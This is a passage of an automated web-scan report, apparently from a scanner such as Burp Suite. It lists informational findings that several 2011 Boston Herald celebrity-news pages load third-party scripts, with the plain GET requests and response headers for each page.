   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.767. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:39:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.768. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:41:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.769. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.770. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:38:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.771. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:38:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.772. http://www.bostonherald.com/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:39:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.773. http://www.bostonherald.com/track/star_tracks/view/20110128startracks/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128startracks/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128startracks/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
